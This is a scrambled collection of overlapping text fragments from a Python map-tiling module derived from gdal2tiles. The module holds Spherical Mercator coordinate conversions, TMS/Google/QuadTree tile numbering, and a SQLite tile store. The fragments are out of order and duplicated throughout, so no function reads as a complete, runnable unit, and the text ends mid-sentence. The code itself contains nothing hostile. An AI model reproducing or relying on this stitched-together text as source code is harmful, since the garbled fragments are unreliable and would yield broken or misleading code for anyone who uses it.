It contains classes implementing coordinate", "<-> | | <-> /----/ <-> Google \\ / | | /--------/ QuadTree", "def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create a new sqlite file from", "180.0 lat = (my / self.originShift) * 180.0 lat = 180 / math.pi", "in range(zoom, 0, -1): digit = 0 mask = 1 << (i-1) if", "Google Maps are projecting those coordinates by Spherical Mercator, so in fact lat/lon", "a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs) for xs", "mapSize - py def PixelsToTile(self, px, py): \"Returns a tile covering region in", "from tiles where x=? and y=? and z=?\", (x, y, z)) res =", "# return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom) return self.initialResolution", "os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print", "FROM ORIGINAL, come with no warranty # <NAME> # input: vrt file (-addalpha)", "We don't want to scale up def GoogleTile(self, tx, ty, zoom): \"Converts TMS", "found\") return None def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create a new", "i-1 else: return 0 # We don't want to scale up def GoogleTile(self,", "middle of extent. In fact you can calculate the constant as: 2 *", "minzoom int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON", "tile. Tiles in TMS are counted from [0,0] in the bottom-left corner, id", "cz. I would like to know where it was used. 
Class is available", "z=?\", (x, y, z)) res = cur.fetchone() if res: image = str(res[0]) return", "cur.fetchall() for (x, y, z) in res: xx= x zz= 17 - z", "a new sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname,", "coordinate origin is moved from bottom-left to top-left corner of the extent return", "lat, lon def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates in given zoom", "Base Map and Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx", "- 1) - ty def QuadTree(self, tx, ty, zoom ): \"Converts TMS tile", "[] self.db.commit() def readImage(self, x, y, z) : \"\"\" read a single tile", "definition is in the official EPSG database. Proj4 Text: +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0", "180.0 lat = 180 / math.pi * (2 * math.atan( math.exp( lat *", "Tiles in pyramid lat/lon XY in metres XY pixels Z zoom XYZ from", "mapSize = self.tileSize << zoom py = mapSize - pyr res = self.Resolution(", "the Y direction, which is not visually noticable. How do I create a", "/ 180.0 return mx, my def MetersToLatLon(self, mx, my ): \"Converts XY point", "case you use this class in your product, translate it to another language", "coordinates Spherical Mercator Pixels in pyramid Tiles in pyramid lat/lon XY in metres", "from Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum\" lon = (mx /", "Microsoft Maps compatible tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map", "(ty & mask) != 0: digit += 2 quadKey += str(digit) return quadKey", "TMS EPSG:4326 EPSG:900913 .----. 
--------- -- TMS / \\ <-> | | <->", "= 32 class GlobalMercator(object): \"\"\" TMS Global Mercator Profile --------------------------- Functions necessary for", "for given zoom level (measured at Equator)\" # return (2 * math.pi *", "tile for given mercator coordinates\" px, py = self.MetersToPixels( mx, my, zoom) return", "* self.originShift / 180.0 return mx, my def MetersToLatLon(self, mx, my ): \"Converts", "new sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite)", "if (tx & mask) != 0: digit += 1 if (ty & mask)", "don't need the extra precision of an ellipsoidal projection. The spherical projection causes", "p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty,", "with Google Maps, Microsoft Virtual Earth, Yahoo Maps, UK Ordnance Survey OpenSpace API,", "px * res - self.originShift my = py * res - self.originShift return", "): \"Converts XY point from Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum\"", "Create a new sqlite file from a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for", "Functions necessary for generation of global tiles used on the web. It contains", "- ty for i in range(zoom, 0, -1): digit = 0 mask =", "an ellipsoidal projection. The spherical projection causes approximately 0.33 percent scale distortion in", "language or find it usefull for your project please let me know. My", "Global Mercator\", GEOGCS[\"WGS 84\", DATUM[\"WGS_1984\", SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"],", "distortion in the Y direction, which is not visually noticable. 
How do I", "- 1 ) ty = int( math.ceil( py / float(self.tileSize) ) - 1", "- py def PixelsToTile(self, px, py): \"Returns a tile covering region in given", "SPHEROID[\"WGS 84\",6378137,298.257223563, AUTHORITY[\"EPSG\",\"7030\"]], AUTHORITY[\"EPSG\",\"6326\"]], PRIMEM[\"Greenwich\",0], UNIT[\"degree\",0.0174532925199433], AUTHORITY[\"EPSG\",\"4326\"]], PROJECTION[\"Mercator_1SP\"], PARAMETER[\"central_meridian\",0], PARAMETER[\"scale_factor\",1], PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1,", "(2**zoom - 1) - ty def QuadTree(self, tx, ty, zoom ): \"Converts TMS", "tiles:: LatLon <-> Meters <-> Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels", "for OSGEO. In case you use this class in your product, translate it", "tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type, )) self.minzoom = None self.maxzoom =", "math.pi / 180.0)) - math.pi / 2.0) return lat, lon def PixelsToMeters(self, px,", "from [0,0] in the bottom-left corner, id is XYZ. Google placed the origin", "in the Y direction, which is not visually noticable. How do I create", "\"Converts TMS tile coordinates to Google Tile coordinates\" # coordinate origin is moved", "in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference of", "= self.Resolution( zoom ) mx = px * res - self.originShift my =", "Map Tiles as defined in Tile Map Service (TMS) Profiles ============================================================== Functions necessary", "want to scale up def GoogleTile(self, tx, ty, zoom): \"Converts TMS tile coordinates", "image) : \"\"\" write a single tile from string \"\"\" if (x, y,", "i!=0: return i-1 else: return 0 # We don't want to scale up", "values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create", "WGS84 datum, yeh? 
Yes, all lat/lon we are mentioning should use WGS84 Geodetic", "on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum, yeh? Yes,", "numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select", "x, y, z, f) : \"\"\" write a single tile from a file", "Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left). What", "website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon coordinates are using WGS84 datum, yeh? Yes, all lat/lon", "MSDN documentation: To simplify the calculations, we use the spherical form of projection,", "yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y,", "tile in latutude/longitude using WGS84 datum\" bounds = self.TileBounds( tx, ty, zoom) minLat,", "\"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type, )) self.minzoom", "bands: 1 grayscale, one alpha mask import sqlite3 import os import math __version__", "in Tile Map Service (TMS) Profiles ============================================================== Functions necessary for generation of global", "projection causes approximately 0.33 percent scale distortion in the Y direction, which is", "counted from [0,0] in the bottom-left corner, id is XYZ. Google placed the", "\"\"\" CREATE TABLE IF NOT EXISTS info ( desc TEXT, tilenumbering TEXT, minzoom", "156543.03392804062 What is the difference between TMS and Google Maps/QuadTree tile name convention?", "y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new sqlite", "tile coordinates are in TMS notation (origin [0,0] in bottom-left). 
What coordinate conversions", "pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0: return i-1", "projection, not the ellipsoidal form. Since the projection is used only for map", "from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y,", "): \"Maximal scaledown zoom of the pyramid closest to the pixelSize.\" for i", "if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else: return False def close(self): self.commitData(force=True)", "z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs) for xs in", "* math.pi * 6378137 / 2.0 $ echo 180 85 | gdaltransform -s_srs", "GIS tools like gdalwarp, cs2cs or gdaltransform. All of the tools supports -t_srs", "were on the WGS84 ellipsoid. From MSDN documentation: To simplify the calculations, we", "self.tileSize << zoom return px, mapSize - py def PixelsToTile(self, px, py): \"Returns", "this class in your product, translate it to another language or find it", "(mx / self.originShift) * 180.0 lat = (my / self.originShift) * 180.0 lat", "20037508.342789244 * 2 / 256 = 156543.03392804062 What is the difference between TMS", "the pyramid closest to the pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize >", "tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001.", "as defined in Tile Map Service (TMS) Profiles ============================================================== Functions necessary for generation", "on sphere are treated as if the were on the WGS84 ellipsoid. From", "--------- /------------/ KML, public WebMapService Web Clients TileMapService What is the coordinate extent", "single tile from string \"\"\" if (x, y, z) in self.written: return self.written.add((x,", "origin is in the middle of extent. 
In fact you can calculate the", "def QuadTree(self, tx, ty, zoom ): \"Converts TMS tile coordinates to Microsoft QuadTree\"", "digit = 0 mask = 1 << (i-1) if (tx & mask) !=", "my = my * self.originShift / 180.0 return mx, my def MetersToLatLon(self, mx,", ": \"\"\" read a single tile as string \"\"\" cur = self.db.cursor() cur.execute(\"select", "please let me know. My email: klokan at klokan dot cz. I would", "The spherical projection causes approximately 0.33 percent scale distortion in the Y direction,", "- y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new", "= self.tileSize << zoom return px, mapSize - py def PixelsToTile(self, px, py):", "by 256x256 pixels tile, every lower zoom level resolution is always divided by", "of Code 2008, project GDAL2Tiles for OSGEO. In case you use this class", "return self.PixelsToTile( px, py) def TileBounds(self, tx, ty, zoom): \"Returns bounds of the", "f) #cur.execute('insert into tiles (z, x, y,image) \\ # values (?,?,?,?)', # (z,", "one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\")", "and you can overlay them on top of base maps of those web", "def __init__(self, tileSize=256): \"Initialize the TMS Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution", "32 class GlobalMercator(object): \"\"\" TMS Global Mercator Profile --------------------------- Functions necessary for generation", "Google \\ / | | /--------/ QuadTree ----- --------- /------------/ KML, public WebMapService", "gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude) bigger then 85.05112878 are", "the were on the WGS84 ellipsoid. 
From MSDN documentation: To simplify the calculations,", "tx, ty, zoom ): \"Converts TMS tile coordinates to Microsoft QuadTree\" quadKey =", "string \"\"\" cur = self.db.cursor() cur.execute(\"select image from tiles where x=? and y=?", "a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z", "= None self.written = set() self.db.commit() self.pending_images = [] def open(self, filename) :", "for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0: return i-1 else:", "Maps compatible tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map and", "is moved from bottom-left to top-left corner of the extent return tx, (2**zoom", "a single tile as string \"\"\" cur = self.db.cursor() cur.execute(\"select image from tiles", "self.originShift = 2 * math.pi * 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self,", "if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur = self.db.cursor()", "VERSION MODIFIED FROM ORIGINAL, come with no warranty # <NAME> # input: vrt", "self.maxzoom: self.maxzoom = z self.commitData() def commitData(self, force = False): if len(self.pending_images) >", "tiles (z, x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def", "and y=? and z=?\", (x, y, z)) res = cur.fetchone() if res: image", "EXISTS tiles ( x int, y int, z int, s int, image blob,", "TMS tile coordinates to Microsoft QuadTree\" quadKey = \"\" ty = (2**zoom -", "degined as EPSG:3785. WKT definition is in the official EPSG database. Proj4 Text:", "Google placed the origin [0,0] to the top-left corner, reference is XYZ. 
Microsoft", "maxLon ) def TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon =", "math.log( math.tan((90 + lat) * math.pi / 360.0 )) / (math.pi / 180.0)", "warranty # <NAME> # input: vrt file (-addalpha) in 3857 projection (projection is", "self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for", "TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from", "of an ellipsoidal projection. The spherical projection causes approximately 0.33 percent scale distortion", "Z zoom XYZ from TMS EPSG:4326 EPSG:900913 .----. --------- -- TMS / \\", "given zoom level (measured at Equator)\" # return (2 * math.pi * 6378137)", "or gdaltransform. All of the tools supports -t_srs 'epsg:900913'. For other GIS programs", "What is the coordinate extent of Earth in EPSG:900913? [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]", "Maps/QuadTree tile name convention? The tile raster itself is the same (equal extent,", "17 - z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname,", "readImage(self, x, y, z) : \"\"\" read a single tile as string \"\"\"", "Global Mercator Profile --------------------------- Functions necessary for generation of tiles in Spherical Mercator", "overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme from a BigPlanet", "available under the open-source GDAL license (www.gdal.org). 
\"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object):", "+x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format of EPGS:900913: PROJCS[\"Google", "Meters <-> Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles", "): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _ ,", "bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat, maxLon )", "__doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles as defined in Tile Map Service", "def close(self): self.commitData(force=True) cur = self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom", "we don't need the extra precision of an ellipsoidal projection. The spherical projection", "the origin [0,0] to the top-left corner, reference is XYZ. Microsoft is referencing", ") return ( minx, miny, maxx, maxy ) def TileLatLonBounds(self, tx, ty, zoom", "initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062 What is the difference", "): \"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:900913\"", "More info at http://spatialreference.org/ref/user/google-projection/ The same projection is degined as EPSG:3785. 
WKT definition", "self.tileSize = tileSize self.initialResolution = 2 * math.pi * 6378137 / self.tileSize #", "compatible tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map and Google", "- GlobalGeodetic (based on EPSG:4326) for OpenLayers Base Map and Google Earth compatible", "Mercator EPSG:900913\" mx = lon * self.originShift / 180.0 my = math.log( math.tan((90", "which is 40 thousand kilometers, the coordinate origin is in the middle of", "conversions do we need for TMS Global Mercator tiles:: LatLon <-> Meters <->", "<-> Google \\ / | | /--------/ QuadTree ----- --------- /------------/ KML, public", "for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy,", "tiles where x=? and y=? and z=?\", (x, y, z)) res = cur.fetchone()", "overwrite=False): \"\"\" Create a new sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS", "not the ellipsoidal form. Since the projection is used only for map display,", "license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS Global Mercator Profile", "extent. 
In fact you can calculate the constant as: 2 * math.pi *", "the web clients like Google Maps are projecting those coordinates by Spherical Mercator,", "of the given tile in EPSG:900913 coordinates\" minx, miny = self.PixelsToMeters( tx*self.tileSize, (ty+1)*self.tileSize,", "coordinates to Google Tile coordinates\" # coordinate origin is moved from bottom-left to", "math.ceil( px / float(self.tileSize) ) - 1 ) ty = int( math.ceil( py", "projecting those coordinates by Spherical Mercator, so in fact lat/lon coordinates on sphere", "ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys)", "self.pending_images = [] def open(self, filename) : \"\"\" Open an existing file\"\"\" self.filename=filename", "self.db.commit() self.pending_images = [] def open(self, filename) : \"\"\" Open an existing file\"\"\"", "Polar areas with abs(latitude) bigger then 85.05112878 are clipped off. What are zoom", "(EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001. 
Such tiles are compatible with Google", "def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of the pyramid closest to the", "sqlite with TMS numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur", "None def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create a new sqlite file", "y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with", "UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the TMS Global Mercator pyramid\" self.tileSize", "self.tileSize # 156543.03392804062 for tileSize 256 pixels self.originShift = 2 * math.pi *", "ty #def PixelsToRaster(self, px, py, zoom): # \"Move the origin of pixel coordinates", "PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates in given zoom level of pyramid", "self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom is", "Yahoo Maps, UK Ordnance Survey OpenSpace API, ... and you can overlay them", "math.pi * 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts", "in 3857 projection (projection is forced due # to weird effect in AutoCreateWarpedVRT)", "scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x,", "in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps Global Mercator), EPSG:3785, OSGEO:41001. 
Such", "def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme", "- self.originShift return mx, my def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to", "bottom-left to top-left corner of the extent return tx, (2**zoom - 1) -", "rouault $ # VERSION MODIFIED FROM ORIGINAL, come with no warranty # <NAME>", "import math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage():", "NOT EXISTS info ( desc TEXT, tilenumbering TEXT, minzoom int, maxzoom int) \"\"\")", "More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. Google", "can use standard GIS tools like gdalwarp, cs2cs or gdaltransform. All of the", "self.Resolution( zoom ) px = (mx + self.originShift) / res py = (my", "coordinates\" # coordinate origin is moved from bottom-left to top-left corner of the", "for (x, y, z) in res: xx= x zz= 17 - z yy=", "info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. Google Summer", "def LatLonToMeters(self, lat, lon ): \"Converts given lat/lon in WGS84 Datum to XY", "(2**zoom) def ZoomForPixelSize(self, pixelSize ): \"Maximal scaledown zoom of the pyramid closest to", "z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom is None or z <", "( x int, y int, z int, s int, image blob, PRIMARY KEY(x,y,z,s))", ") px = (mx + self.originShift) / res py = (my + self.originShift)", "in bottom-left). 
What coordinate conversions do we need for TMS Global Mercator tiles::", "mx, my, zoom): \"Returns tile for given mercator coordinates\" px, py = self.MetersToPixels(", "sphere are treated as if the were on the WGS84 ellipsoid. From MSDN", "= self.TileBounds( tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon =", "pyramid Tiles in pyramid lat/lon XY in metres XY pixels Z zoom XYZ", "definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same projection is degined", "with TMS numbering scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur =", "to know where it was used. Class is available under the open-source GDAL", "maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\")", "top-left corner, reference is XYZ. Microsoft is referencing tiles by a QuadTree name,", "TEXT, minzoom int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND", "tx, ty, zoom ): \"Returns bounds of the given tile in latutude/longitude using", "overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\") res = cur.fetchall()", "= (my / self.originShift) * 180.0 lat = 180 / math.pi * (2", "= py * res - self.originShift return mx, my def MetersToPixels(self, mx, my,", "0, -1): digit = 0 mask = 1 << (i-1) if (tx &", "the bottom-left corner, id is XYZ. 
Google placed the origin [0,0] to the", "* 6378137) / (self.tileSize * 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self, pixelSize", "0 # We don't want to scale up def GoogleTile(self, tx, ty, zoom):", "0, sqlite3.Binary(image))) if self.minzoom is None or z < self.minzoom: self.minzoom = z", "TMS Global Mercator tiles:: LatLon <-> Meters <-> Pixels <-> Tile WGS84 coordinates", "Google Maps, Microsoft Virtual Earth, Yahoo Maps, UK Ordnance Survey OpenSpace API, ...", "NOT EXISTS tiles ( x int, y int, z int, s int, image", "open(self, filename) : \"\"\" Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db =", "im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with OSM/Bing/Googlemaps", "= (mx + self.originShift) / res py = (my + self.originShift) / res", "# 2 bands: 1 grayscale, one alpha mask import sqlite3 import os import", "find it usefull for your project please let me know. My email: klokan", "of those web mapping applications. Pixel and tile coordinates are in TMS notation", "[0,0] to the top-left corner, reference is XYZ. Microsoft is referencing tiles by", "project GDAL2Tiles for OSGEO. In case you use this class in your product,", "None self.maxzoom = None self.written = set() self.db.commit() self.pending_images = [] def open(self,", "2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new", "... and you can overlay them on top of base maps of those", "EPSG:900913 .----. 
--------- -- TMS / \\ <-> | | <-> /----/ <->", "= self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self, tx,", "tile coordinates to Microsoft QuadTree\" quadKey = \"\" ty = (2**zoom - 1)", "$ # VERSION MODIFIED FROM ORIGINAL, come with no warranty # <NAME> #", "overwrite=False): \"\"\" Create a new storage file, overwrite or not if already exists\"\"\"", "Tiles as defined in Tile Map Service (TMS) Profiles ============================================================== Functions necessary for", "lat, lon ): \"Converts given lat/lon in WGS84 Datum to XY in Spherical", "cur.executemany('insert into tiles (z, x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images = []", "= int( math.ceil( px / float(self.tileSize) ) - 1 ) ty = int(", "on the WGS84 ellipsoid. From MSDN documentation: To simplify the calculations, we use", "in res: xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def", "def Resolution(self, zoom ): \"Resolution (meters/pixel) for given zoom level (measured at Equator)\"", "maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat, maxLon ) def TileLatLonCorners(self,", "# (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new", "just different identification of the same raster tile. Tiles in TMS are counted", "cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS tiles ( x int, y int,", "Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else:", "UK Ordnance Survey OpenSpace API, ... 
and you can overlay them on top", "\"\"\" globalmaptiles.py Global Map Tiles as defined in Tile Map Service (TMS) Profiles", "self.tileSize << zoom # return px, mapSize - py def MetersToTile(self, mx, my,", "GlobalMercator(object): \"\"\" TMS Global Mercator Profile --------------------------- Functions necessary for generation of tiles", "PARAMETER[\"false_easting\",0], PARAMETER[\"false_northing\",0], UNIT[\"metre\",1, AUTHORITY[\"EPSG\",\"9001\"]]] \"\"\" def __init__(self, tileSize=256): \"Initialize the TMS Global Mercator", "with no warranty # <NAME> # input: vrt file (-addalpha) in 3857 projection", "self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z, f) : \"\"\" write a single", "(-addalpha) in 3857 projection (projection is forced due # to weird effect in", "y,image) \\ # values (?,?,?,?)', # (z, x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname,", "target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering", "Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum. Well, the", "math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\"", "\"\"\" write a single tile from string \"\"\" if (x, y, z) in", "<-> Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels in pyramid Tiles in", "SET minzoom = (?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x,", "mapping applications. 
Pixel and tile coordinates are in TMS notation (origin [0,0] in", "zoom): \"Returns bounds of the given tile in EPSG:900913 coordinates\" minx, miny =", "compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on", "EPSG:3785. WKT definition is in the official EPSG database. Proj4 Text: +proj=merc +a=6378137", "ty, zoom ): \"Returns bounds of the given tile in latutude/longitude using WGS84", "if i!=0: return i-1 else: return 0 # We don't want to scale", "it was used. Class is available under the open-source GDAL license (www.gdal.org). \"\"\"", "those coordinates by Spherical Mercator, so in fact lat/lon coordinates on sphere are", "in self.written: return self.written.add((x, y, z)) self.pending_images.append((z, x, y, 0, sqlite3.Binary(image))) if self.minzoom", "tx, ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat,", "Well, the web clients like Google Maps are projecting those coordinates by Spherical", "from a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs) for", "http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03. Google Summer of Code 2008, project", "def PixelsToTile(self, px, py): \"Returns a tile covering region in given pixel coordinates\"", "= mapSize - pyr res = self.Resolution( zoom ) mx = px *", "ellipsoidal projection. 
The spherical projection causes approximately 0.33 percent scale distortion in the", "Google Tile coordinates\" # coordinate origin is moved from bottom-left to top-left corner", "single tile as string \"\"\" cur = self.db.cursor() cur.execute(\"select image from tiles where", "Tile coordinates\" # coordinate origin is moved from bottom-left to top-left corner of", "we need for TMS Global Mercator tiles:: LatLon <-> Meters <-> Pixels <->", "in res: xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) #", "\"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS Global Mercator Profile --------------------------- Functions", "\"\"\" Sqlite files methods for simple tile storage\"\"\" def __init__(self, type): self.type=type def", "used only for map display, and not for displaying numeric coordinates, we don't", "zoom level constants (pixels/meter) for pyramid with EPSG:900913? whole region is on top", "percent scale distortion in the Y direction, which is not visually noticable. How", "is in the official EPSG 